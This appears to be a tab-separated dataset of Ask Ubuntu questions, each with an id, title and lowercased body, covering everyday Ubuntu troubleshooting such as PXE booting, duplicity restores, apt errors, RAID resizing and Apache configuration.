473096	ubuntu 14.04 i386 no network devices detected on pxe	i 'm looking to get ubuntu 14.04 set up on pxe . x64 version works just fine , but for version i386 the downloaded ramdisk ( initrd.gz ) and kernel file ( linux ) md5sum 's do not match up with the values from the text file `` /ubuntu/dists/trusty/main/installer-i386/current/images/sha1sums '' can we please get the files checked and corrected , or am i missing something ? the problem : x64 works perfectly fine , i386 no network device detected at all . files are downloaded from the following : /ubuntu/dists/trusty/main/installer-i386/current/images/netboot/ubuntu-installer/i386/initrd.gz /ubuntu/dists/trusty/main/installer-i386/current/images/netboot/ubuntu-installer/i386/linux i also extracted them from the following file : /ubuntu/dists/trusty/main/installer-i386/current/images/netboot/netboot.tar.gz note : the initrd.gz and linux file md5 check sum values actually matches with the files downloaded from the links prior to this and all are from archive.ubuntu.com any help appreciated , please advise . thanks , -mc
473101	.desktop file not working	i have a .desktop file that contains these lines : [ desktop entry ] name=firestorm comment=client for online virtual worlds , such as second life exec=/home/deus/programs/firestorm_64bit/firestorm icon=/home/deus/programs/firestorm_64bit/firestorm_icon.png terminal=false type=application targetenvironment=unity startupwmclass=do-not-directly-run-firestorm-bin categories=application ; network ; startupnotify=true i just re-installed ubuntu 14.04 before the reinstall this file worked just fine . now it does n't . i did set the exec property . when i run it from terminal i get this : deus @ xxx : ~/desktopshortcuts $ ./firestorm.desktop ./firestorm.desktop : line 1 : [ desktop : command not found ./firestorm.desktop : line 3 : for : command not found ./firestorm.desktop : line 10 : network : command not found can anyone tell me what the problem is and how to fix it ? thank you .
473102	permanently end processes	the point is that i installed xubuntu and at one point i get on the screen one light bulb increasing and decreasing the light on the display ( laptop ) so i found in task manager that it is this xfce4-power-manager and since i kill the process it stops and in that session it 's ok. so i know the solution but since this is my third day on linux platform i do n't know how to disable this process permanently so if some one know to expand and explain baby steps how can be done . 10x up front .
473105	icefury ( nanofury ) under ubuntu	i recently purchased an icefury usb device to mine sha-256 cryptocoins . however , the device is not being recognized under xubuntu 14.04 . i have tested the device under windows and it is hashing along nicely at about 2.05 gh/s using bfg miner 3.10.0 ( imagine my frustration at having to boot into windows to perform this task ) . has anyone had luck with this device or another nanofury device ? any ideas about kernal support or how to troubleshoot this problem ? thank you .
473111	terminator - execute script and keep command prompt active	i installed terminator on my ubuntu and i saved my own layout with 5 terminal windows . now i want to execute a shell script in each window . the problem is that when script terminates the terminal window becomes useless as there is no more command prompt . i.e . i can save my layout and put a command `` top '' in layout config . the next time i start terminator `` terminator -m -l mylayout & '' it will open my layout , execute command `` top '' in the respective sub terminal , but if i press `` q '' to quit `` top '' that terminal does n't have command prompt any more . is there a way to fix it ? and , is there a way to pass commands to terminal windows inside terminator layout from a separate gnome-terminal window ?
473114	create a custom syntax highlight in gedit	following my question from long ago , i am still trying to tweak my fortune handling capabilities . the display in terminal is awesome , just one thing remains - syntax highlighting in gedit as i add , edit or delete individual fortunes . my custom fortune files are in this format : friend : `` whats a good movie ? '' me : `` snakes on a plane '' friend : `` whats it about ? '' me : `` horses ... horses on a boat ... '' @ ayysian % me on my wedding : you still like me , right ? @ comedyposts % mum : son i 'd love to meet your girlfriend ... me : me too ... @ comedytruth % doctor : `` ok , so what 's wrong , how are you feeling ? '' me : *looks at mum waiting for her to explain* @ childhoodfact % friend : 75 % of people are good at maths ... me : mmmmh , i guess then am in the remaining 18 % ... @ thefunnyteens % i loved the titanic . my favorite character was the iceberg @ __grumpycat it 's basically a tweet , @ name and the % character . then repeat . when i open it in gedit , everything is black . i 'm looking for a way to create a syntax highlighting file that will convert the % to something like blue and the @ name to something like magenta . the tweet can remain black . note : the fortune files are mime-type text/plain and only the given format really distinguishes them from another plain text file . fortune files have no extension .
473116	what architectures and bootloaders for tablets is needed to run the ubuntu desktop ?	lately you can see all kinds of laptop/tablet/pc hybrids : laptop convertibles , tablet pcs , tablets . also , they run either arm , atom or full core i3/5/7 processors . some use grub , others use eufi . i was wondering on which of these can i install ubuntu desktop edition ( currently 14.04 lts ) . i 'd like to be able to : boot up from the usb drive ( probably some keyboard shortcut ) install ubuntu with the regular image touch support optionally recognize tablet keys and orientation i 'd like to know which architectures ( core/atom/arm ) and bootloaders ( grub/eufi ) supported ubuntu desktop . can i install ubuntu desktop on any tablet , as long as it runs core i3/5/7 , for eg. ? thanks
473118	ubuntu wo n't stay installed	i recently experienced os problems with windows 8 so i decided to wipe my hard drive and install ubuntu using a usb boot . i am able to `` try ubuntu '' or choose to install instantly , however , after installation it asks me to restart my computer but when i do this i receive the same installation options i originally had , `` try ubuntu '' , `` install '' , `` oem install '' , `` repair disk '' . i initially thought this was the result of leaving the boot usb in , so i tried reinstalling , but now i just receive a message saying `` no boot disc or boot disc failed '' . this happens with any type of install i do , i 've tried clearing the hard drive multiple times , making a new boot usb , but nothing seems to help . i 've tried reinstalling windows , but i encounter the same problem , without the usb i get an error . i have an acer aspire m3470 , i cleared my hard drive and attempting to install via usb boot . i have a weird bios menu probably because of amd but it 's been hard to find information regarding my particular bios menu . here is an image of my bios menu
473121	why does apt-get purge dereference links for deletion ?	the advantages of not doing so would be : different config files can be managed with links ( which would be deleted by apt-get purge deleting the link target and leaving the link in the config directory will most certainly cause the next configuration routine to fail because broken links are often not covered in test cases of pacakge maintainers disadvantages are none because either the file is a link or a file which would be deleted in the config directory ( but not in the shared config directory there the link target points to ) ( both fulfill the requirements of apt-get purge ) . linking the configuration file in a routine or manually after dpkg configure routine , indicates pretty strongly that i 'll take care about the link target ( in terms of removal ) myself .
473122	pci-e sealevel dual serial card not recognized on ubuntu 14.04	new to ubuntu , running 14.04 . i have trouble with the serial port setup , i have a plug-in pci-e sealevel dual serial card that is not recognized . user1 @ wsiworkstation2 : ~ $ dmesg | grep tty [ 0.000000 ] console [ tty0 ] enabled [ 1.577197 ] 00:06 : ttys0 at i/o 0x3f8 ( irq = 4 , base_baud = 115200 ) is a 16550a [ 1.943326 ] tty ttyprintk : hash matches [ 17.240880 ] ttys4 : lsr safety check engaged ! [ 17.241589 ] ttys4 : lsr safety check engaged ! [ 17.242354 ] ttys5 : lsr safety check engaged ! [ 17.243058 ] ttys5 : lsr safety check engaged ! [ 17.243918 ] ttys6 : lsr safety check engaged ! [ 17.244485 ] ttys6 : lsr safety check engaged ! [ 17.245195 ] ttys7 : lsr safety check engaged ! [ 17.245830 ] ttys7 : lsr safety check engaged ! [ 17.246554 ] ttys8 : lsr safety check engaged ! [ 17.247191 ] ttys8 : lsr safety check engaged ! user1 @ wsiworkstation2 : ~/desktop/seacom $ lspci -d 135e : -vvv 02:04.0 bridge : sealevel systems inc device e205 ( rev aa ) subsystem : sealevel systems inc device e205 control : i/o+ mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- serr- capabilities : however , the manufacturer 's drivers wo n't install : 1. user1 @ wsiworkstation2 : ~/desktop/seacom $ make install -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- installing seacom suite . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- installing utilities -- /usr/bin/ld : skipping incompatible ../../lib/libftd2xx.a when searching for -lftd2xx /usr/bin/ld : can not find -lftd2xx collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ setusb ] error 1 make [ 1 ] : *** [ install ] error 1 make : *** [ install ] error 1 2. user1 @ wsiworkstation2 : ~/desktop/seaio $ make install -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- installing sd suite . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- *compiling seaio library source file : digitaliodevice.cpp gcc : error trying to exec 'cc1plus ' : execvp : no such file or directory make [ 1 ] : *** [ digitaliodevice.o ] error 1 make : *** [ install ] error 1 i was not able to find a solution , so if anyone can help it will be much appreciated . ps have some troubles with formatting my post , apologies ...
473123	menu bar and launcher dissappeared	what can i do with this message in the terminal ? basically the menu bar and launcher is gone . the following packages have unmet dependencies . ubuntu-desktop : depends : ubuntu-session but it is not going to be installed recommends : empathy but it is not going to be installed e : unable to correct problems , you have held broken packages . i 've tried ... sudo apt-get purge fglrx lightdm & & sudo apt-get install lightdm ubuntu-desktop ... then i get this massage .
473124	extract duplicity files manually	i lost the drive , and the ubuntu os installed in it , from which i created a backup using duplicity , and i do n't know how to restore the archived files i still keep in another drive . they all follow these 4 notations duplicity-full.20140106t111233z.manifest duplicity-full-signatures.20140106t111233z.sigtar.gz duplicity-full.20140106t111233z.volxxx.difftar.gz ( multiple volumes ) duplicity-full.20140106t111233z.volxxx.difftar ( multiple volumes ) there 's important data i need to recover . is there anything i can do ? would be enough to use gzip ? and if so , how could i extract them all easily ? edit 1 trying your suggestions , both with the restore and the -- gio options , i get this text : duplicity restore file : //media/ubuntu/toshiba\ hdd/backups/documents/ /media/ubuntu/9fb63c8e-ecb5-4c55-b4e0-282e7b4a82ff/tmp/docs/ local and remote metadata are synchronized , no sync needed . last full backup date : none gnupg passphrase : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1494 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1488 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1337 , in main do_backup ( action ) file `` /usr/bin/duplicity '' , line 1422 , in do_backup restore ( col_stats ) file `` /usr/bin/duplicity '' , line 697 , in restore restore_get_patched_rop_iter ( col_stats ) ) : file `` /usr/bin/duplicity '' , line 719 , in restore_get_patched_rop_iter backup_chain = col_stats.get_backup_chain_at_time ( time ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 952 , in get_backup_chain_at_time raise collectionserror ( `` no backup chains found '' ) collectionserror : no backup chains found /media/ubuntu/toshiba\ hdd/backups/documents/ is where all the duplicity files are , and /media/ubuntu/9fb63c8e-ecb5-4c55-b4e0-282e7b4a82ff/tmp/docs/ a temporary destination folder i want to restore the files to . edit 2 corrected the missing slash in file : //media ... . now i get restored files , but not exactly what i expected . there are a lot of files missing ( up to 24 gb in there ! ) root @ ubuntu : /media/ubuntu/toshiba hdd/backups/documents # ls -la /tmp/docs/home/luis/ total 4176 drwx -- -- -- 16 root root 1000 jun 30 19:13 . drwx -- -- -- 3 root root 60 jun 30 19:13 .. drwx -- -- -- 3 1000 1000 60 oct 23 2013 .activestate drwxr-xr-x 2 1000 1000 60 oct 23 2013 .activestate drwx -- -- -- 3 1000 1000 60 dec 28 2012 .adobe -rw -- -- -- - 1 1000 1000 32120 jan 4 12:56 .bash_history -rw-r -- r -- 1 1000 1000 220 dec 28 2012 .bash_logout -rw-r -- r -- 1 1000 1000 3637 dec 28 2012 .bashrc drwx -- -- -- 3 1000 1000 60 jan 3 14:01 .cache drwxr-xr-x 3 1000 1000 60 nov 16 2013 .cddb -rw-rw-r -- 1 1000 1000 740 jan 10 2013 .cola drwx -- -- -- 3 1000 1000 60 dec 29 2012 .compiz drwxrwxr-x 3 1000 1000 80 oct 1 2013 .composer drwx -- -- -- 46 1000 1000 1020 dec 8 2013 .config drwx -- -- -- 3 1000 1000 60 dec 28 2012 .dbus -rw-r -- r -- 1 1000 1000 25 jul 13 2013 .dmrc drwx -- -- -- 3 1000 1000 380 jan 6 10:31 .dropbox drwxr-xr-x 6 1000 1000 1660 dec 17 2013 .dropbox-dist drwx -- -- -- 3 root root 60 jun 30 19:13 .eclipse -rw -- -- -- - 1 1000 1000 50282 jan 6 10:29 .iceauthority drwxrwxr-x 14 1000 1000 340 dec 7 2013 .playonlinux -rw-r -- r -- 1 root root 2077491 nov 23 2013 .soulseek.1385165090491 -rw-r -- r -- 1 root root 2076644 nov 23 2013 .soulseek.1385166430938 -rw-r -- r -- 1 1000 1000 9986 dec 30 20:02 .soulseek.1388433748295 drwxrwxr-x 2 1000 1000 60 oct 13 2013 .syncwall -rw -- -- -- - 1 1000 1000 109 jan 6 10:29 .xauthority -rw-rw-r -- 1 1000 1000 0 jul 29 2013 .xauthority.25y20w -rw-rw-r -- 1 1000 1000 0 jul 13 2013 .xauthority.7k14zw -rw-rw-r -- 1 1000 1000 0 jul 7 2013 .xauthority.7k7szw -rw-rw-r -- 1 1000 1000 0 jul 13 2013 .xauthority.9x1e0w -rw-rw-r -- 1 1000 1000 0 sep 1 2013 .xauthority.a3d52w -rw-rw-r -- 1 1000 1000 0 sep 1 2013 .xauthority.ceuv2w -rw-rw-r -- 1 1000 1000 0 jul 27 2013 .xauthority.cp7q0w -rw-rw-r -- 1 1000 1000 0 sep 8 2013 .xauthority.e1et2w -rw-rw-r -- 1 1000 1000 0 aug 26 2013 .xauthority.e32k2w -rw-rw-r -- 1 1000 1000 0 sep 14 2013 .xauthority.ekk92w -rw-rw-r -- 1 1000 1000 0 jul 12 2013 .xauthority.f4qrzw -rw-rw-r -- 1 1000 1000 0 jul 25 2013 .xauthority.isvz0w -rw-rw-r -- 1 1000 1000 0 jul 11 2013 .xauthority.ju3uzw -rw-rw-r -- 1 1000 1000 0 aug 31 2013 .xauthority.m30s2w -rw-rw-r -- 1 1000 1000 0 aug 1 2013 .xauthority.m3h20w -rw-rw-r -- 1 1000 1000 0 sep 9 2013 .xauthority.mkin2w -rw-rw-r -- 1 1000 1000 0 aug 28 2013 .xauthority.rwhb2w -rw-rw-r -- 1 1000 1000 0 jul 15 2013 .xauthority.sn85zw -rw-rw-r -- 1 1000 1000 0 sep 15 2013 .xauthority.t22c3w -rw-rw-r -- 1 1000 1000 0 jul 14 2013 .xauthority.t6cb0w -rw-rw-r -- 1 1000 1000 0 jul 31 2013 .xauthority.vf7q0w -rw-rw-r -- 1 1000 1000 0 sep 9 2013 .xauthority.wgex2w -rw-rw-r -- 1 1000 1000 0 aug 31 2013 .xauthority.wzr52w -rw-rw-r -- 1 1000 1000 0 jul 25 2013 .xauthority.yqir0w most strange is , besides all the files starting with a dot , that i ca n't browse the home/luis directories with nautilus , which in fact were where all my backed up data was .
473125	launcher not opening completely	i am using ubuntu 14.04 when i installed ubuntu launcher was working perfectly.but now it is not opening completely . when i keep auto hider off then it works perfectly . can any one help me with this problem ? ?
473128	building a debian package with two buildsystem	i have a package that needs to be build with both a regular makefile and a setup.py . the thing is that the debian packaging magic that is invoked via debuild would recognize a makefile and do the right make make install destdir= ? ? ? thing and get it working right . when i only have a setup.py sitting there and have dh $ @ -- with python3 -- buildsystem pybuild in debian/rules , it will correctly install the python module with python3 setup.py build python3 setup.py install -- install-layout deb -- root= ? ? ? ? ? ? i do not know all those flags . and i think that i do not need to . i just want the makefile magic to happen , and then the setup.py magic . how can i tell debuild to do both ? when i do the following in debian/rules % : dh $ @ dh $ @ -- with python3 -- buildsystem pybuild it will only put the first one into the resulting package . i tried to delete the debhelper.log between those , but that did not change much .
473131	show login text with byobu	when i log into my server , i 'm usually greeted with a bunch of stats , like this : but if i enable byobu on login ( through byobu-enable ) , i do n't get to see the stats . i 'm immediately presented to byobu when i login : of course , the stats are output , but byobu immediately clears the screen . is there any way to see the stats while still having byobu run at login ?
473132	caffeine doesnt function	caffeine is not functioning properly . it starts but with two processes but unavailable from the system tray . have apt-get purge caffeine too avail . i have noticed it auto starts but in not in my startup applications . thanks in advance
473133	ubuntu 12.04 slow graphic with paraview	i am running ubuntu 12.04 on a laptop dell latitude e4310 with an integrated vga compatible intel graphic card i915 ( vers . 2 ) . i recently installed the software paraview to visualize the results of cfd simulations i do . i am facing serious problems when i zoom in and out because the response is extremely slow , while i can rotate the model normally . i have already tested the graphic card with the utility `` mesa-util '' and it seems that the 3d and 2d acceleration is working properly ( at least from the visualized `` gear '' of mesa-util ) . i have faced the same problem with ubuntu 14.04 lts and therefore i decided to switch back to 12.04 , because i did not have any problems while using paraview with ubuntu 12.04 from a live usb stick . do you have any suggestions how can i solve this problem ? thank you in advance for your help .
473134	which hidden files and directories do i need ?	in a previous question , i explained my situation/plan : backing up home directory on external drive , reformatting laptop drive , installing 14.04 , putting home directory back . ( it has n't happened yet because i ca n't seem to find the down time , in case things are n't working right away . ) it occurred to me that maybe i do n't want all of those hidden files and directories ( e.g . .local/share/ubuntuone/syncdaemon/ , .cache/google-chrome/ , etc . ) just judging by the amount of time in copying , i can tell that some of these hidden directories are large . question : are there any hidden directories that i obviously do n't need/want when i have the laptop running an updated distribution ? will they cause conflicts ? ( i plan on copying the backed-up directory tree back onto the laptop with the -- no-clobber option . )
473136	apt-get update error - binary-i386 , binary-amd64	when i run : sudo apt-get update it shows me the following error : w : failed to fetch http : //ppa.launchpad.net/directhex/ppa/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/directhex/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i have googled for solutions , but none of what i found , have worked for me . please give me your suggestions
473138	stuck at login screen after update ( 27.05.14 )	as the title suggests , i am stuck at the login screen . my system ( ubuntu 14.04 ) was working fine and the problem appeared after i installed all updates and the following restart . basically i can log in , but unity wo n't load . i only see the standard wallpaper ( not my personal ) and i can use the mouse . i tried several things ... like -install lightdm-gtk-greeter -sudo apt-get install compizconfig-settings-manager export display=:0 ccsm -unity -- reset -sudo dconf reset -f /org/compiz/ ( shows always wrong command ... ) -enabling the unity plugin ( the plugin was already enabled , so ... ) -rm -rf ~/.compiz-1 ~/.config/compiz-1 if i `` startx '' ( via alt-ctrl-f1 ) i get this output . . . loading extension glx modprobe : fatal : module fglrx not found . ( ww ) fglrx : no matching device section for instance ( busid pci:081:0:1 ) found modprobe : fatal : module fglrx not found . loading extension fglrxextension loading extension glx [ glesx ] __glesxextensioninit : no gl es2.0 capable screen found ! the xkeyboard keymap compiler ( xkbcomp ) reports : > warning : type `` one_level '' has 1 levels , but < ralt > has 2 symbols > ignoring extra symbols errors from xkbcomp are not fatal to x server the xkeyboard keymap compiler ( xkbcomp ) reports : > warning : type `` one_level '' has 1 levels , but < ralt > has 2 symbols > ignoring extra symbols errors from xkbcomp are not fatal to x server my system : ubuntu 14.04 64bit i5-3570k ati radeon hd 7970 ghz edit : with the old kernel 3.13-0-24 it works ... the newer 3.13.0-27 is the problem
473140	shrink ext4 partition on raid 10	my question is similar to move ext4 partition , but the challenge i could n't figure out is how to shrink a partition from the start . so suppose originally the partition ( with raid ) is like this . ( ************** /dev/md127 *************** ) after resizing , i want to achieve like this . ( *** unallocated *** ) ( **** /dev/md127 **** ) note , i can not use gparted , and parted does not support ext4 . the commands i have tried so far , % resize2fs -p /dev/md127 1676g # < == this is good . % lvreduce -l 1676g /dev/md127 path required for logical volume `` md127 '' please provide a volume group name run `lvreduce -- help ' for more information . then i found some link ( http : //www.howtoforge.com/how-to-resize-raid-partitions-shrink-and-grow-software-raid ) that describing how to change partition of raid . $ mdadm -- grow /dev/md127 -- size=max mdadm : can not set device size for /dev/md127 : invalid argument failed here , `` man mdadm '' shows that `` -- grow '' does not with raid 10 . need some help . note , i use `` -- size=max '' just for quick test , it wo n't work with other values either . then after that , i am thinking to create another partition right after this one , copy the data to that partition , and remove this one , like . 1 . ( ************** /dev/md127 *************** ) 2 . ( **** /dev/md127 **** ) ( *** new partition ** ) 3 . ( *** unallocated **** ) ( **** /dev/md127 **** ) thanks .
473148	ubuntu 14.04 server ; permissions being reset	for some reason about once or twice everyday the permissions of my files in /var/www are changed from 755 to something else that forbids public viewing from the web broswer . i have no idea why web server is doing this . the command i use is as follows . am i missing something ? sudo chmod 755 -r /var/www either i am missing something or ubuntu or apache has some bug . update : i have also noticed that new files when i ftp them become `` forbidden '' as well . this does not make sense as i set the permissions via -r .
473149	some info about sd card patitions after the use of the dd statment and some oiters doubts ?	i am not very experienced using linux and i have the following situation that cause me some doubts . i have wrote raspbian ( the raspberry linux distribution ) on an sd card using ubuntu dd statment : sudo dd if=2014-01-07-wheezy-raspbian.img of=/dev/sdb bs=1024 so if now i perform the fdisk -l statment i obtain that i have 2 partitions related to my sd card , that are the followins : dispositivo boot start end blocks id system /dev/sdb1 8192 122879 57344 c w95 fat32 ( lba ) /dev/sdb2 122880 5785599 2831360 83 linux and now the first doubt : the dd statment create on the sd card two partitions : 1 ) /dev/sdb1 that is a litle fat32 partition ( what it means ( lba ) ? ) 2 ) /dev/sdb2 that is a larger linux ext3 partition ok ... the doubt is : why it also create to me a fat32 partition and not only a linux ext3 partition ? ok ... if i go into my computer resource i can see a device ( related to my sd card ) into the devices list that contains some raspbian file , following a screenshot : and if i see the property of this device i obtain this : so , looking at the previous screenshot it seems to me that this is the small fat32 partition , and now i have the followings doubts : if it is the smallest fat32 partition , what contains ? the raspbian boot or what ? why , in the devices list , i have only the fat32 partition and not also the linux one ( /dev/sdb2 ) , to see it have i to mount it ? how ? tnx
473151	how do i access files on an mtp device ?	i ca n't play music or view photos from my phone on ubuntu 14.04 . i can browse the files with the nautilus , but they wo n't open . rhythmbox crashes when trying to play music and the photo viewer says `` failed to open input stream for file . '' i have no idea what this means . how can i fix ? *edit : i just tried copying the file from my phone to my disk , and sure enough it works just fine and now the file opens . after googling some more , someone said you ca n't stream the file from android and it has to be copied locally because it 's a `` functional limitation of mtp . '' is this true ? it 's able to stream in windows ...
473155	operating system not found , win7 dual boot	after installing 14.04 from a liveusb alongside windows 7 and encountering no problems for about a week , i shut down windows and rebooted only to see the `` operating system not found '' message and being unable to boot into either . tried to boot to liveusb again to try to run boot repair , and now the liveusb no longer boots either . i can get to the ubuntu advanced boot options screen and run memtest86 , but when i choose `` try ubuntu '' the screen hangs on the 14.04 loading screen with the orange dots . i 've tried the f6 options ( acpi off , noapic , nomodeset ) any ideas ? i 'm writing this on an ipad ( ugh ) because i am now computer-less . ( sony vaio laptop , intel i7 , nvidia card , running win7 and ubuntu 14.04 )
473156	i installed ubuntu gnome 14.04 to be dual-booted with windows 8.1 , but after the restart , it only boots to windows .	thank you for your support and help .
473158	swich from ubuntu ( unity ) lockscreen/login to gnome	i have ubuntu gnome installed on my pc and i also installed the unity shell , the problem is i seem to have lost the gnome login screen and lock screen , is it possible to switch back from the new unity one to the original gnome one ? thanx
473159	route all windows shares on home network to be discoverable over vlan at other network location	okay , so just like the title say , . i have two lan networks ( say net1 and net2 ) . -- net1 has pc1 and pc2 . -- net2 has pc3 and pc4 . these networks are connected through , shall we say hamachi . i want a linux machine on net2 that has hamachi linked to the machines on net1 to route these machines to net2 's lan . ( basically i want to make a double-vlan discoverable router ? [ we have to go deeper ] ) in your guy 's opinion what would be the best solution to this issue ? for the record i know this is not the most 'ideal situation ' , i have a several clients that do not wish to have hamachi installed on their systems so i figured that it would be easier if i had a portable device which makes my virus removal server/backup box route through the portable device to the lan the device is connected to .
473160	start page ubuntu	if you set the startpage of firefox to about : startpage ( or http : //start.ubuntu.com ) you get this : if you use http : //start.ubuntu.com/current/yahoo/ you get this : is it possible to use other search engines in the ubuntu start page . i 'm particularly interested in duckduckgo.com .
473164	sharing files to another account	i have just opened an account on the system settings on my pc for family members . i want to put some pictures and videos from my account on to theirs .
473166	unity not working	i have ubuntu 14.04 and it has run fine until yesterday , when an update for ubuntu was installed . i rebooted and it was in low-resolution without the launcher or taskbar . i reinstalled my nvidia driver and fixed the low res , but unity will not load . i can right click as well as use anything on my desktop , but the taskbar and launcher are gone , and i can not run terminal . i have gnome fallback session , and gnome works fine . help getting unity back ?
473174	intel wireless 7260 does not work on ubuntu 12.04	i 've installed ubuntu 12.04 on my lenovo x240 laptop which has a intel wireless 7260 . i do n't know why the network connection does not show anything . actually nothing comes up ; no internet connection . could someone help me with the steps to figure it out ?
473175	unable to have option to boot up windows 7 partition	i recently installed ubuntu 3.13.0 , and updated to 13.15.0 . after reboot , i no longer had the option to choose to boot up my windows 7 partition . i have tried boot repair , but have gotten ** ( gksudo:3150 ) : critical ** : fcntl error ** ( gksudo:3150 ) : warning ** : lock taken by pid : -1 . exiting .
473176	installing icedteaplugin for chrome	i am trying to get the java plugin to work on chrome but have failed so far . i made symbolic links for the two files : icedteaplugin.so and libjavaplugin.so i made the links in the file section /opt/google/chrome/plugins/ , where it should be . yet when i go to the browser the plugin does not work . the plugin does not even show up on the chrome plugins page . i have restarted the browser as well . is there something i forgot to do when i made the links ?
473179	webm videos converted with avconv not working properly	i 'm converting mp4 videos to webm with the following command : avconv -i input.mp4 -c : v libvpx -qmin 10 -qmax 42 -maxrate 500k -bufsize 1000k -threads 2 -c : a libvorbis output.webm am i doing something wrong ? should i use all of these parameters ? i just want to make the videos compatible with all the browsers/devices . the videos are not working on firefox on most devices and on chrome in a specific android device that i have . edit : when i play the embeded videos on firefox , on any android device , it goes straight to the end and does n't play . it only plays if i click in the progress bar . if i open the videos on firefox without embedding them in a html page , they seem to have a bigger width box outside then , while the video is inside it . i uploaded a video that i converted . try it in firefox : https : //mega.co.nz/ # ! cg9fvzjd ! cpc6x3nxh8ravdbis9zqqwyitdypb_qkkaksvqxrpzi this is a comparison between the videos , after and before the conversion : ! [ image here ] : http : //i.imgur.com/v2fijcq.jpg
473181	clearing mount points for ntfs patitions	ubuntu server 14.04 . i have two internal hard drives . i have a windows xp and ubuntu dual boot system . one disk has two ntfs partitions for the xp system and windows data . the second hard drive has two partitions for ubuntu data . the correct mount points for ubuntu data on the 2nd drive are ( a ) /media/ken/linux-data and ( b ) /media/ken/data2 . on system startup i get mounting errors for both mount points . i ran gparted and found that the two ntfs partitions on disk 1 have the same mount points . i have no idea how this happened . how can i remove the mount points for the ntfs partitions ?
473182	apache 2.4.7 - proxypassmatch overrides require directive in < directory > ?	i have started the process of upgrading my servers from 12.04 to 14.04 this week , and i have run into all sorts of problems , most of which i have figured out . this one has me stumped though . i am using apache 2.4.7 with php5-fpm with mod_proxy_fcgi . i had preferred to use sockets , but the current implementation seems broken , so i settled on the following config : < virtualhost *:80 > servername host.domain.com serveradmin webmaster @ domain.com documentroot /var/www < directory /var/www/ > options followsymlinks allowoverride none authuserfile /etc/apache2/passwd authname `` username and password required '' authtype basic require valid-user < /directory > proxypassmatch ^/phpmyadmin/ ( .*\.php ( /.* ) ? ) $ fcgi : //127.0.0.1:9000/usr/share/phpmyadmin/ $ 1 proxypassmatch ^/ ( .*\.php ( /.* ) ? ) $ fcgi : //127.0.0.1:9000/var/www/ $ 1 errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > include /etc/phpmyadmin/apache.conf what seems to happen however , is whenever the request is for a php file the require directives are completely ignored . if the request is not matched by proxypassmatch ( not a php file ) i get the username/password prompt . if the request is for a php file the authentication is bypassed and the php file is run . is this a bug or am i implementing this the wrong way ? my goal is to have a functional fpm/fastcgi setup .
473184	play dvd movie using parole	i have installed parole dvd player and would like to watch a movie . when i start parole it is not clear how to load and start the movie . the movie is a dvd purchased from the store . how do i start the movie using parole ?
473186	how do i use a wrapper ? trying to set up a network install	https : //help.ubuntu.com/community/installation/localnet i 'm trying to follow the above instructions but am getting stuck at step 3 . start bootp : here is a wrapper to start and stop bootpd from the command line . what is a wrapper and how do i use it ?
473187	need to clean up disk space	i 'm running ubuntu 13.04 which is not supported anymore . i want to install updates and clean up disk space in boot . how do i do this ? what command should i use .
473194	installing lubuntu without internet	this is my 1st question.i am installing lubuntu lxde along side windows xp.windows xp worked fine before and after instalation , including the internet.during the installation of lubuntu a dialog box popped up and said `` you are now disconneted from the internet.this dialog box came up two more time.after the instaltion was complete everything seemed to work fine except i have no connection to the internet.i.m new to linux.what i think might be happening is the lack of an internet conn. is preventing me from getting the neccesary drivers.if so , can i download these drivers to a usb and then manually install i have copies of terminal text command outputs if that would help in anyway.thank you for being patient with a newbie .
473195	problem with loading scripts	whenever i try to load an example into the codepen site ( http : //codepen.io/ ) i receive the loading.. message at the bottom at the page but it 's never loaded.. i also have the same problem whenever i try to login to some web sites ( bodybuilding.com for example ) .. i see the loading/waithing symbol and nothing happens . i checked in about : config and javascript is enabled i also tried switching to chrome ( rather than firefox ) and it 's the same result note : i have flash player installed and enabled what could be the problem ? ?
473196	why are files i create on a mounted drive owned by a different user ?	my main user is uid=1001 , but when i create files on a mounted drive , they end up with ownership of uid-1000 ... other users on this machine do n't have the issue . how might i fix this ?
473197	can i make a script to prevent mouse bounce clicks ?	recently my mouse has started bounce clicking , single clicks act as double and even tipple clicks most if the time . holding left click tends to spam click and trying to do anything has become increasingly difficult if i wish to use my external mouse . i have come to the understanding that it is indeed my mouse and not my operating system due to the fact that the mouse is old and beat up . holding click spams the following ( in terminal i used 'xev | grep button ' to return the following output . ) buttonpress event , serial 36 , synthetic no , window 0x4400001 , buttonrelease event , serial 36 , synthetic no , window 0x4400001 , windows has a function built in to prevent bounce clicks , i was wondering if there was a way to do this in linux before i go out and buy a new mouse .
473199	ppa removal problems	in an effort to use my printer , i installed a ppa but in the end , this ppa was not necessary . now , this ppa causes an error when updates are loaded . the update error message is the following : w : failed to fetch http : //ppa.launchpad.net/michael-gruz/canon/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/michael-gruz/canon/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i looked over the web how to remove a ppa but the answers are too technical for my level of understanding . i found this line : sudo add-apt-repository -- remove ppa : whatever/ppa but i do n't know what should be put in place of the `` whatever '' . on top of that , i ca n't even remember how i installed this ppa . i know i went to this page : https : //launchpad.net/~michael-gruz/+archive/canon/+packages and somehow , followed the included instructions , without really knowing what i was doing . according to some help pages i found , installed file in /etc/apt/sources.list.d should give me some hints : jockey.list nvbn-rm-ppa-precise.list langdalepl-gvfs-mtp-precise.list nvbn-rm-ppa-precise.list.save 